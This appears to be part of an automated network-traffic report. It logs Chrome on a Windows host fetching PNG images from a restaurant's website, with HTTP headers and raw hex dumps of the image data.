                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: f7 7f 29 e8 0e ff de 6d 0b 80 6d 59 44 a3 a1 6f a7 62 b1 8f da c5 06 61 45 42 ec 1d c6 b7 db c8 46 15 41 92 08 ea 22 92 e6 e2 29 6b a1 8b 04 42 d8 b6 8b 67 37 88 38 6d 04 57 80 70 8a ba eb 63 ad 5c 24 10 0a e1 e8 49 ec 40 08 51 ed 60 d6 1a 38 af 66 3d 8b a2 84 e7 09 f8 be 04 82 8f e3 75 f0 5d e9 27 42 fe 89 a0 ad 26 96 1a 44 1d fb 59 c2 63 6f 65 cf 8e 59 ca 53 97 30 3b 0a 92 51 c7 cc dc 45 78 34 81 e2 97 c9 5f 99 c1 9b 9b c6 b2 a1 83 4a 04 87 78 bc 9b ee 5d 3f 43 c8 be 41 be d8 0b f2 f3 44 33 43 68 eb f6 b1 b5 5d 26 3f 7d 9e 48 28 88 5b f7 30 ab a7 a9 fb 30 32 7e 84 80 55 c2 6b aa b4 17 3c a6 f2 33 b4 db 22 f7 ec d5 b8 6f 77 0c ad 37 ce 8d 25 8b e1 43 5d 44 0f ff 1e 66 b3 40 5b 5d 41 93 43 44 f0 31 44 11 cf 36 51 08 a1 a4 b6 50 2d 5c 5f e3 90 17 cb 84 9d
                                                                                                                                                    Data Ascii: )mmYDobaEBFA")kBg78mWpc\$I@Q`8f=u]'B&DYcoeYS0;QEx4_Jx]?CAD3Ch]&?}H([002~Uk<3"ow7%C]Df@[]ACD1D6QP-\_
                                                                                                                                                    2024-10-01 04:26:26 UTC5047INData Raw: eb 6d 49 6b 72 4c 30 6d 94 4c 28 d8 60 15 14 7e c1 c1 2a da 6c 6e b6 31 4a 43 ec da f3 43 24 4b d7 f1 4a 2d d2 66 03 ab 1b d1 5d 85 b1 03 c3 54 46 0e e1 fb e7 48 7a ab c8 d4 26 29 f5 b3 b5 31 4f 71 62 1f 3d cb 22 5c db 62 ac 14 b0 da 7c 8a 90 19 74 90 11 2c 5e a3 cf 2d 93 ce 1c 21 d0 db 36 7a 59 af 4b d4 78 8e f2 e0 6e ea 63 7b e9 6c 5d 23 ce 35 56 d9 a1 7d e3 22 5b 51 8b b6 75 84 57 fc 9d ff 07 a1 56 10 22 65 63 ed 22 f3 5f 78 0f 9b de 28 6e e5 36 56 97 cf d0 f9 ec 17 58 3d fb 39 b6 62 b8 ff 95 33 14 47 27 39 f3 e2 a3 ac 5c df 8c e6 db e9 df 29 ef e4 3f 0c 16 fe a7 b1 89 6f 5f 40 83 24 17 90 46 f9 0f 8b 72 e9 b4 33 39 f9 ab ae 2a 22 ad 1c c3 b0 51 c2 46 db 0a e9 59 e8 38 42 b7 03 a4 cc c9 2c 8f dc 2e c0 da 26 85 be 49 74 71 8c 24 0a c8 55 be ed 2c 95 04
                                                                                                                                                    Data Ascii: mIkrL0mL(`~*ln1JCC$KJ-f]TFHz&)1Oqb="\b|t,^-!6zYKxnc{l]#5V}"[QuWV"ec"_x(n6VX=9b3G'9\)?o_@$Fr39*"QFY8B,.&Itq$U,


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    8192.168.2.449751162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:26 UTC636OUTGET /assets/imgs/cook_dinner.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:26 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:26 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 84519
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:26 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:27 UTC6016INData Raw: b6 11 15 c5 ac 24 25 29 08 28 19 c9 92 19 60 98 c4 e4 d4 3d 33 9d 43 75 e5 7a f3 f3 fb a3 1a d4 df d9 c7 bd f7 d9 ee 73 dc fb eb 7b 5d ef 75 75 ff d1 5d dd 55 eb 5d cf 5a f7 ba ef 7b 09 a5 14 ff bc fe 79 fd 4f b9 e4 3f df 82 7f 5e ff 0c e8 7f 5e ff bc fe 19 d0 ff bc fe 79 fd d7 5f fa 5f 7e b3 76 dd 9b ff e5 2f 28 84 02 0c b2 d5 90 52 e0 a2 e5 c7 88 26 33 e8 f1 66 5a 5a 53 fc f6 5b df 66 f9 13 7f 44 86 3e 61 52 67 34 5d 65 b8 ea 73 e2 e2 23 58 7c e8 7e d4 4d 98 43 61 c7 6e 3c ad c4 be 7b 1f cc 1f ee 78 90 af dc f4 2d 16 1d 39 19 cb 55 1c f9 e1 4b d8 6b ef 7d b9 f5 fa af d0 fb ca 5b b4 ed 31 09 39 a7 83 62 7e 8c 9d 3b 77 63 85 1a e9 4c 1d 24 22 84 6e 40 31 3b 86 18 76 89 fb 92 88 0e a1 1b 60 a1 b3 bd 3a 46 eb 92 19 9c 7f fa 87 d9 dc b7 83 b7 d7 be 42 c4 8a
                                                                                                                                                    Data Ascii: $%)(`=3Cuzs{]uu]U]Z{yO?^^y__~v/(R&3fZZS[fD>aRg4]es#X|~MCan<{x-9UKk}[19b~;wcL$"n@1;v`:FB
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 4c 02 88 bb 01 db 5e df 46 74 5e 23 93 13 69 c2 a2 c7 96 d2 18 f7 bc 72 1f 1b 2e dc c9 c5 a7 5d cb af 9e 7c 89 ee f7 de e0 37 df bc 9e fb 7f f7 27 16 ec b9 27 df ff d9 ed bc f2 fa 4b dc 76 c5 e5 64 81 0f 1d 71 14 8f bf f3 2e 3f 7c f4 51 ce 3d e4 50 92 e9 18 8f bf bb 9c fe fe 01 ce 5f ba 14 b3 5a 66 6a 47 1d 0b 66 4c a4 5c ec a5 dc 57 c1 68 89 72 d8 d1 87 f1 e6 33 0f 30 34 58 e2 8a 4f 5e c6 cc 45 8b f8 ed 8f bf c9 68 f7 66 36 6f df c6 b6 de dd 4c 2c f7 13 aa 90 5d c5 90 1f 7c eb 1e 32 a6 c9 e3 77 ff 92 d3 af bd 19 9f 10 2f 70 d1 34 0b 42 81 50 35 88 ae 56 b6 a8 9a c0 58 0a 08 6b 62 00 47 e8 34 59 d0 b7 e1 6d b2 d9 7e ea 5a 17 a2 07 01 a1 52 78 02 a4 21 49 c7 33 54 cb 05 fc c0 03 3f 40 69 01 4a d7 51 81 0f 9e 8f 30 74 22 99 0c 95 ec 28 a1 e7 12 49 66 f0 3d
                                                                                                                                                    Data Ascii: L^Ft^#ir.]|7''Kvdq.?|Q=P_ZfjGfL\Whr304XO^Ehf6oL,]|2w/p4BP5VXkbG4Ym~ZRx!I3T?@iJQ0t"(If=
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 1b 23 66 45 d1 94 24 08 03 42 19 22 a5 42 08 8f 52 de 21 9f ed 23 1e 4f 21 a5 89 0a 1c ea 23 51 94 15 52 a8 0c 50 aa e4 90 22 4a 2c 16 e5 94 0f 9f c7 09 a7 9d c9 7b 6b 56 b3 fa dd 57 58 f1 f6 cb 6c df b0 8e 0d 6f 2f e7 f5 37 96 13 03 9a 27 34 a3 45 52 4c 9f 3e 95 64 44 e2 d9 0e 42 29 f2 b9 2a 66 2a 49 32 96 20 f4 5c 94 1b 20 0d 93 c0 2d a1 6b 1e 16 0a bb 5c c6 d0 25 55 a1 c8 a4 13 b5 f2 c6 32 70 aa 25 e2 96 46 34 16 23 12 8d 62 c4 6b 19 a4 ea 57 29 94 ab 34 4f 9b 41 f7 d6 2e a2 d1 08 ba 1e 81 68 1d 8e 18 22 ea 04 f8 a1 c3 68 3e 4f f7 60 85 ce d6 14 1f ff da 4d 9c 75 d1 e5 34 b5 27 d8 bd ab 4c b1 94 23 0c 5d 54 a8 a1 a1 08 02 8f 3d f6 de 97 2d 5d 9b 19 1e 1a a4 a5 4d a3 be 3e 4d d4 30 79 f8 a1 07 b9 fc 63 2d 0c 0d 8c e0 fb 1a 55 bb 88 eb 97 90 f8 e8 aa a6
                                                                                                                                                    Data Ascii: #fE$B"BR!#O!#QRP"J,{kVWXlo/7'4ERL>dDB)*f*I2 \ -k\%U2p%F4#bkW)4OA.h"h>O`Mu4'L#]T=-]M>M0yc-U
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: b5 67 6e 70 74 9c 32 58 8d b8 f7 81 75 5a 4d 8f 78 56 62 59 0e b3 b4 40 13 b0 7f b4 e0 20 55 7c ed 9f fa d3 b4 3b 2d 92 24 ae 7d 37 c2 06 cb 01 e4 87 36 d6 3b 9f fe ea 18 83 fd 83 95 b2 aa 5e 3f 9b 4f d7 82 c0 27 f0 6c 2c 63 11 c7 39 ae e7 60 59 9a 45 52 60 3b 11 45 96 e2 b9 92 34 a9 98 4c 16 5c 38 bf c5 6f 7d e8 97 f8 e4 17 de 47 91 8f 88 bc 1e 17 b6 ee e3 e1 07 5e cb 7d 77 3d 88 e3 b7 08 1c 17 a3 0a 66 c9 0c 63 14 08 97 4e b7 87 b0 40 55 8a 3c 2f 58 cc 13 ba dd 5e 2d 5a d4 9a c9 e8 84 fb ef bf 87 5e 67 89 20 f2 68 fb 92 cf 7c e4 a3 7c e4 bf fc 7b 96 06 0d 3c d7 47 0a c3 22 8d b1 1d 17 a7 12 08 ad 11 76 8d ac 92 b6 45 d0 88 b0 7d 07 4f a7 bc 78 f9 06 17 1e 7a 0d 0f bd f2 76 16 93 3a 97 2c 44 6d 99 12 56 ad 4d d3 aa a2 cc 33 aa a2 a0 2a 72 84 ae 6a 01 8f
                                                                                                                                                    Data Ascii: gnpt2XuZMxVbY@ U|;-$}76;^?O'l,c9`YER`;E4L\8o}G^}w=fcN@U</X^-Z^g h||{<G"vE}Oxzv:,DmVM3*rj
                                                                                                                                                    2024-10-01 04:26:27 UTC12967INData Raw: 3e ca 84 d1 a8 40 89 80 d1 30 65 6d 55 83 bf 8b 67 bf ec b5 5c f3 92 17 f3 27 6f 7d f3 7f 78 ec 50 91 4c 88 f3 26 57 5f 85 94 43 e9 fc 9f f4 43 02 c1 44 7b 82 63 77 7d ec e8 a9 47 6f bf fb b2 67 3c eb 49 4b 27 4e 93 f5 15 83 5e ca c6 aa 87 e7 39 78 fe 34 37 3c f7 a5 3c ed 79 2f e5 cc b9 0d 0e 3d 7c 07 f7 df fa 09 4e 1f 7e 98 95 73 27 89 9a 35 76 6c df 02 59 81 2d 62 ea 51 0b 2f 08 58 5e 59 c6 0a 87 66 b3 86 28 72 70 55 e5 e8 15 d4 c8 6d 55 71 d6 c6 e2 02 52 58 94 2b 30 c2 21 d7 15 68 51 4a 89 eb ba 95 e0 5d 29 f2 ac 04 04 9e e3 90 a7 59 05 0b 93 55 e9 ec 7c 5b 59 eb 4a 3c 24 a5 c4 71 1c 3c d7 c5 a9 d7 71 94 ac d4 82 52 e0 39 2e 68 43 e4 6a 3e f6 37 7f c9 4b 5e fe 06 6a f5 16 dd 5e 46 a1 33 a4 1b 22 c6 17 cd b0 d6 20 aa d5 c9 c6 56 c6 55 40 6b a4 51 4f 04
                                                                                                                                                    Data Ascii: >@0emUg\'o}xPL&W_CCD{cw}Gog<IK'N^9x47<<y/=|N~s'5vlY-bQ/X^Yf(rpUmUqRX+0!hQJ])YU|[YJ<$q<qR9.hCj>7K^j^F3" VU@kQO


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    9192.168.2.449752162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:26 UTC637OUTGET /assets/imgs/cook_dessert.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:26 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:26 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 73690
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:26 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:27 UTC8192INData Raw: 2d cd 38 ac b1 ac 19 5b b4 66 d6 b2 64 2f 69 66 d6 8c ad b1 c7 33 92 c7 1a 5b a6 22 25 5b 94 87 94 28 51 62 12 29 92 00 48 84 6e a0 d1 e8 dc 5d 55 5d f1 d6 4d 5f 7a df f7 84 3d 7f 9c f7 bb 55 8d 4c 91 e2 92 48 7c 58 8d ae ae ba f7 d6 17 f6 d9 67 ef 67 3f cf b3 95 88 f0 95 c7 57 1e bf 57 1e fa 2b 6f c1 57 1e 5f 09 e8 af 3c be f2 f8 4a 40 7f e5 f1 95 c7 57 02 fa 2b 8f af 3c be 12 d0 5f 79 fc fe 7d d8 cf fe 8d 7f f6 e3 7f f1 77 f6 6f 50 82 42 d0 4a 83 33 04 81 d5 c2 73 eb 68 c1 7c d9 21 01 a2 17 92 b1 a4 6a 44 59 9d 65 b2 71 9e 53 a7 c7 6c 9b cb fc bd ff ee ff c2 33 9f 7a 96 bb 2e ec 80 2e 08 21 d2 f5 3d 8b e3 05 7e e1 a9 aa 12 5d 15 2c 42 22 b8 31 d1 8d 88 41 08 b1 67 b5 6a 59 ad 7a aa ba a1 ae 4a 66 b3 63 16 f3 19 ce 18 c0 e0 d1 20 20 be 87 94 30 d6 22 4a
                                                                                                                                                    Data Ascii: -8[fd/if3["%[(Qb)Hn]U]M_z=ULH|Xgg?WW+oW_<J@W+<_y}woPBJ3sh|!jDYeqSl3z..!=~],B"1AgjYzJfc 0"J
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: b7 f1 55 df fa 43 7c e6 23 3f cb d1 d5 a7 48 5a b1 b5 7b 81 aa 18 65 b0 51 14 7d df d3 77 1d 5a 43 51 e4 b1 73 d7 65 a8 aa 8b 9e e0 97 24 25 a0 35 c1 47 a2 ef d1 1a 22 1e a5 0b 46 f5 18 1f 12 9a 4c 0a 92 08 29 42 52 05 b8 0c 83 69 e3 48 80 0f 81 18 05 2d 06 63 35 ba d0 98 b2 c0 95 5b 10 5a 74 f4 84 6e 46 17 5a 54 bf c2 18 97 99 7e 28 ac b5 88 ab f0 de e3 db ee 04 b1 d1 5a 51 96 8e c2 95 18 ad d1 68 da ae cb 1c 99 a1 b9 34 5a 9f 0c ad 34 9a 44 24 d1 93 c4 9f 34 92 eb 87 0f fe 0e fc 3d 5b 2e 48 14 48 1e 34 c3 e4 34 92 24 81 36 04 49 78 ef b1 c6 3c 5c 2a f3 67 d1 7a 46 4a bf f6 3b dd 21 fe eb a9 a1 b3 7a fe bd ba d0 ff 3b b4 9c bf fc fc 25 f6 5f bd ce e9 33 15 47 cb 7d f6 e6 86 fb de f6 10 8e 82 4b 9f fe 24 be 3f 04 77 81 83 5b 33 8e 0f 5f 25 6e dc cd 83 d3
                                                                                                                                                    Data Ascii: UC|#?HZ{eQ}wZCQse$%5G"FL)BRiH-c5[ZtnFZT~(ZQh4Z4D$4=[.HH44$6Ix<\*gzFJ;!z;%_3G}K$?w[3_%n
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 29 eb c0 64 3a a5 0b 23 e6 fb 47 a4 ee 06 c6 ee a2 9a 0d e2 6a 41 6a 46 98 cd 7b 28 da 25 cb 57 9f e4 e6 cb bf c1 7c f7 31 a4 d9 c6 6d 5d 20 de b8 c8 33 4f 1d f0 99 4f b7 34 4d c1 a4 81 f9 ec 26 a5 1b a1 d5 84 90 b2 0c a5 b6 c0 7c 9f f9 f1 8a 38 3e cb 78 72 0a d9 bc 0b 3d de c4 16 35 6a b5 07 b2 8f da 18 13 76 1f a5 1d df 47 44 58 5c 7c 82 ee f9 7f c1 bd 67 b7 29 b7 4f 31 3b 6e e8 16 73 88 f1 64 7a ba ae a3 75 e6 ce d6 22 34 5f 34 a0 ff fc ff f1 2f 4f 5c e1 26 d3 8d 69 b9 b3 b5 c9 c6 74 ca e6 e6 06 e3 51 43 33 72 54 75 45 59 d6 94 a5 a5 ac 0d 75 59 61 ad a5 ac 34 d6 65 fd a0 d6 26 2b 12 d2 b0 ba 46 e2 00 a8 9b bc f7 63 d5 62 8d 63 ba b5 45 51 d5 f4 7d 4f d7 ae b2 99 b8 8a 8c 9a 8a e8 03 46 6b aa aa 64 3c 6d 68 1a c7 74 3a 25 76 89 9f fe 47 3f c7 ff f9 ff
                                                                                                                                                    Data Ascii: )d:#GjAjF{(%W|1m] 3OO4M&|8>xr=5jvGDX\|g)O1;nsdzu"4_4/O\&itQC3rTuEYuYa4e&+FcbcEQ}OFkd<mht:%vG?
                                                                                                                                                    2024-10-01 04:26:27 UTC16346INData Raw: c1 d9 96 e5 ac ab 99 92 30 24 8d 23 9c 87 bc 58 30 cd 17 24 71 8a 71 b6 83 d9 d7 35 ce 4b d2 e1 16 a5 af 29 16 cb 8e 33 22 34 c6 77 24 aa 3a 6f d0 d2 d3 1f 68 36 36 35 c2 b6 14 a7 40 a4 89 57 86 48 ad 29 a6 13 8a d3 13 d2 b5 88 30 0b 10 c2 33 cf 67 3c dc 7f 44 9b 7b ae 0c f6 10 fe 94 d3 e2 80 60 fb 45 aa de 75 24 9a ad 4b 3d b2 91 64 76 ea f8 ec 67 5e e4 27 fe dc 4f b0 ba 32 e0 de db 6f 31 99 2d d0 28 42 a1 e9 27 d9 a4 6d db bf a7 c2 f0 96 fe 80 9a fb f7 70 a0 83 f0 77 ab 42 ba ba a5 d7 8b ab 40 8a 7f 5c e6 f9 73 4d d5 3e 2b b5 26 08 23 bc 06 e7 1a 02 9d 10 a8 88 ba 9e e1 ac 65 d8 eb 21 bc 67 7a 76 86 70 82 5e dc 43 c9 10 d5 4b 48 07 8a 30 08 68 eb ba cb db 5a 43 9c 04 5c bd 76 89 ed dd 8b 4c 26 13 16 8b 05 45 55 90 2f 0b ea aa e5 e8 60 c2 72 5e 90 65 03
                                                                                                                                                    Data Ascii: 0$#X0$qq5K)3"4w$:oh665@WH)03g<D{`Eu$K=dvg^'O2o1-(B'mpwB@\sM>+&#e!gzvp^CKH0hZC\vL&EU/`r^e


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    10192.168.2.449750162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:26 UTC639OUTGET /assets/imgs/cook_breakfast.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:26 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:26 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:04:58 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 82284
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:26 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:27 UTC8192INData Raw: 80 b6 b6 b6 2d da 6a 2b 6a 8b 39 bc 20 4a a3 ad 62 20 e7 82 2a aa 28 2a e7 78 ea d4 c9 71 e7 95 66 7c c2 f7 c7 3a da 76 bf d0 9f b6 f0 7d d8 f2 8c b1 c6 d8 6b ec b0 c6 d8 f3 9a f7 bc c3 75 5d b7 08 21 f0 ed f3 ed f3 7f cb 91 df fe 17 7c fb 7c 1b d0 df 3e df 3e df a2 47 ff e3 37 ef 7a e5 96 6f ea 87 05 40 4b 41 2a a0 cc 6b 10 1e 21 04 04 89 89 a7 d0 69 4c 3c 5a 46 35 a6 b0 93 db 70 56 83 f0 54 ce 13 5c 8d 2f 47 a8 30 42 84 1c 1f 04 c6 4c 62 9a 33 88 66 07 19 6a 5c b6 4c 5d 0e 11 26 a2 35 b1 1d a7 22 7c 9d a1 b2 9c ba ec 11 42 85 f0 0e 22 85 54 0d a0 c2 db 1c ad 0c 78 70 f5 10 e7 4a 9c 05 ad 34 41 37 a8 aa 9c 3a 5b c5 ba 1a 29 6b bc af 11 62 82 48 77 13 5b 15 9b ab 7c 75 21 54 6a 6b b5 96 6d ac 57 86 1b 86 eb cc 68 15 26 27 ba b2 a3 b4 6f a8 a6 32 34 82 ac
                                                                                                                                                    Data Ascii: -j+j9 Jb *(*xqf|:v}ku]!||>>G7zo@KA*k!iL<ZF5pVT\/G0BLb3fj\L]&5"|B"TxpJ4A7:[)kbHw[|u!TjkmWh&'o24
